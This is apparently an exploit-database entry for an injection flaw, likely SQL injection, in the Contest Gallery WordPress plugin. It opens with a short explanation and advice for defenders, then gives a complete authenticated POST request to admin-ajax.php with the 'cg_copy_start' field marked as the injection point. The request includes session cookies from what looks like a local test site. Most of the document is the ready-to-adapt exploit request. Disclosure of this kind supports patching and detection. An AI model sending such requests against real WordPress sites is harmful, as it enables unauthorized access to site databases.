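## https://sploitus.com/exploit?id=WPEX-ID:A66AF8F7-1D5F-4FE5-A2BA-03337064583B

The request below is authenticated (it carries a logged-in WordPress session cookie) and targets `admin-ajax.php` with the action `post_contest_gallery_action_ajax`. The `cg_copy_start` field is the marked injection point; the `/**/` comment delimiters in the placeholder suggest SQL injection, although the page does not name the vulnerability class. For defenders: the sibling fields hold plain integers, so `cg_copy_start` is presumably numeric and the handler should cast it to an integer or bind it through `$wpdb->prepare()`. Request logs can be reviewed for non-numeric `cg_copy_start` values sent to this action.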
POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------153920708638783197901369090779
Content-Length: 1507
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7C8d38932578430fa522ce64ed0143d8be7054cdb5b40694aecf1402276b84f91c; wp-settings-time-2=1668942143; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7Ce49a6e0384972bf193b755ee522182a7075ecf477f3c7a236f7fd32cac02e245
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_type"
cg_copy_type_options_and_images
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy"
true
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_id"
1
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cg_copy_start"
/**/inject-here/**/
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="option_id_next_gallery"
0
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="id_to_copy"
1
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="edit_gallery_hidden_post"
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="copy_v7"
true
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="page"
contest-gallery/index.php
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="action"
post_contest_gallery_action_ajax
-----------------------------153920708638783197901369090779
Content-Disposition: form-data; name="cgBackendHash"
c5df761d52dd842d7a3b5ed58a78774d
-----------------------------153920708638783197901369090779--